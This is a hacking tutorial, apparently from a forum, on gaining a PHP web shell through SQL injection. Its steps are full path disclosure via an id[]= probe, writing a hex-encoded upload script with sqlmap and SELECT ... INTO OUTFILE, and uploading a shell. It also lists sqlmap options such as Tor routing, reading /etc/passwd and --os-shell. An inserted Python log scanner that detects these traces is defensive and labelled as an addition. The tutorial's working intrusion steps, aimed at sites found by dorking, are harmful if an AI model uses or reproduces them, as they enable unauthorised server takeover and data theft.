What you need:
A PHP shell of your choosing
A PHP upload script: http://www.w3schools.com/php/php_file_upload.asp
sqlmap: sqlmap.org
What is a shell, you ask?
"Shell is a shell wrapped in a script. It's a tool you can use to execute arbitrary shell commands or browse the filesystem on your remote webserver. This replaces, to a degree, a normal telnet connection, and to a lesser degree an SSH connection.
You use it for administration and maintenance of your website, which is often much easier to do if you can work directly on the server. For example, you could use PHP Shell to unpack and move big files around. All the normal command line programs like ps, free, du, df, etc. can be used.
There are some limitations on what kind of programs you can run. It won't do any good if you start a graphical program like Firefox or even a console-based one like vi. All programs have to be strictly command line programs, and they will have no chance of getting user input after they have been launched. They probably also have to terminate within 30 seconds, as this is the default time limit imposed on all PHP scripts, to prevent them from running in an infinite loop. Your ISP may have set this time limit to something else.
But you can rely on all the normal shell functionality, like pipes, output and input redirection, etc."
1. After finding a site, either by Google dorking or other means, you need to get full path disclosure: https://www.owasp.org/index.php/Full_Path_Disclosure
I will use the empty array exploit: add the brackets [] to the parameter.
Code:
http://www.example.com/index.php?id[]=1
Code:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/relax/public_html/index.php on line 59
2. You'll need to convert your script to hex; you can do so here: http://www.string-functions.com/string-hex.aspx
So you'll have something like this...
Code:
<form enctype="multipart/form-data" action="upload.php" method="POST">
<input name="uploadedfile" type="file"/>
<input type="submit" value="Upload File"/>
</form>
<?php
$target_path = basename($_FILES['uploadedfile']['name']);
if (move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
    echo basename($_FILES['uploadedfile']['name']) . " has been uploaded";
} else {
    echo "Error!";
}
?>
Converted to hex, it turns into this:
Code:
3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d64617461222061637469
6f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d
653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970
653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d
0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b277570
6c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66
696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c
247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b277570
6c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f616465
64223b7d656c73657b6563686f20224572726f7221223b7d3f3e
3. Now let's fire up sqlmap with --sql-shell and inject.
Code:
python sqlmap.py --url=http://www.example.com/index.php?id=1 --sql-shell
Let sqlmap do its magic; after a while you will get an SQL shell.
Code:
[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>
Now write:
SELECT 0xYour_Hex_Code INTO OUTFILE "Full_Path+filename";
Don't forget the 0x prefix before your hex, so it should look like this:
Code:
select
0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374
696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e61
6d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e707574207479
70653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e
0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775
706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f
66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d
2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775
706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f6164
6564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
into outfile "/home/relax/public_html/upload.php";
After a few seconds it should tell you whether it worked.
4. Then browse to http://www.example.com/upload.php and upload the PHP shell.
5. Browse to your PHP shell by its path and log in. ALWAYS USE A PASSWORD ON YOUR SHELL.
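The write primitive used in the steps above leaves distinctive traces in database and web server logs. This Python example is added here and is not part of the original post: over constructed sample log lines it flags the INTO OUTFILE clause, decodes long 0x hex literals so a hidden <?php tag becomes visible, and catches the id[]= array probe used for path disclosure.

```python
import re

# Constructed sample log lines (not from the original post): MySQL general-log
# style entries and Apache access-log style entries mirroring the tutorial.
SAMPLE_LINES = [
    "2024-01-01T12:00:00 Query SELECT 0x3c3f706870206563686f2027686927203f3e "
    "INTO OUTFILE '/var/www/html/upload.php'",
    "2024-01-01T12:00:01 Query SELECT name FROM users WHERE id = 1",
    '10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /index.php?id[]=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:12:00:03 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512',
]

# MySQL 0x... literals of 8+ hex digits (shorter ones are usually plain numbers).
HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]{8,})\b")
# The file-write clause the tutorial relies on (DUMPFILE is its binary-safe sibling).
OUTFILE = re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\b", re.IGNORECASE)
# A query parameter turned into an array, e.g. ?id[]=1 (the path-disclosure probe).
ARRAY_PARAM = re.compile(r"[?&][A-Za-z_]\w*\[\]=")


def decode_hex_literals(line):
    """Decode each long 0x literal to text; odd-length runs cannot be bytes and are skipped."""
    decoded = []
    for match in HEX_LITERAL.finditer(line):
        digits = match.group(1)
        if len(digits) % 2 == 0:
            decoded.append(bytes.fromhex(digits).decode("latin-1"))
    return decoded


def classify(line):
    """Return the finding tags for one log line (empty list if nothing matched)."""
    findings = []
    if OUTFILE.search(line):
        findings.append("into_outfile")
    # The PHP open tag only becomes visible after decoding the hex literal.
    if any("<?php" in text.lower() or "<?=" in text for text in decode_hex_literals(line)):
        findings.append("hex_encoded_php")
    if ARRAY_PARAM.search(line):
        findings.append("array_param_probe")
    return findings


def scan(lines):
    """Map line index -> findings for every line that triggered at least one rule."""
    return {i: classify(line) for i, line in enumerate(lines) if classify(line)}


if __name__ == "__main__":
    for i, findings in scan(SAMPLE_LINES).items():
        print(f"line {i}: {', '.join(findings)}")
```

Alerting on INTO OUTFILE issued from a web application's database account is a reasonable rule on its own. On the server side, MySQL's secure_file_priv setting and withholding the FILE privilege from that account remove the file-write primitive entirely.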
Extra:
You don't need to use sqlmap; you can simply run the SELECT statement in your browser, though it requires a bit more work.
In theory you could inject the full shell directly instead of first writing the uploader; the problem is that this specific shell is 268 kB, but it might work with a smaller shell.
sqlmap is a really powerful tool; you can do a shitload of stuff with it. Here are some options I find helpful:
-o                        turn on optimization
--threads=1-10            number of threads (faster)
--dbms=mysql              back-end DBMS (faster)
--level=1-5               more tests
--risk=1-3                more tests
--tor-port=xxxx           connect through Tor
--random-agent            random User-Agent
--file-read=/etc/passwd   read a file from the remote machine
--file-write=/etc/passwd  write a local file to the remote machine; must be used with --file-dest
--file-dest=/etc/passwd   remote path where the --file-write file is written
--os-shell                like the sql-shell, but for the operating system
--wizard                  for beginners
--check-waf               check for WAF/IPS/IDS protection
There are many more; just check them out.
The --file-read/--file-write options do not work most of the time; maybe I'm doing something wrong, which is why I use the sql-shell to write files or run specific commands.
--os-shell is awesome, though you can't write PHP code to disk with it.
Hope you guys enjoyed.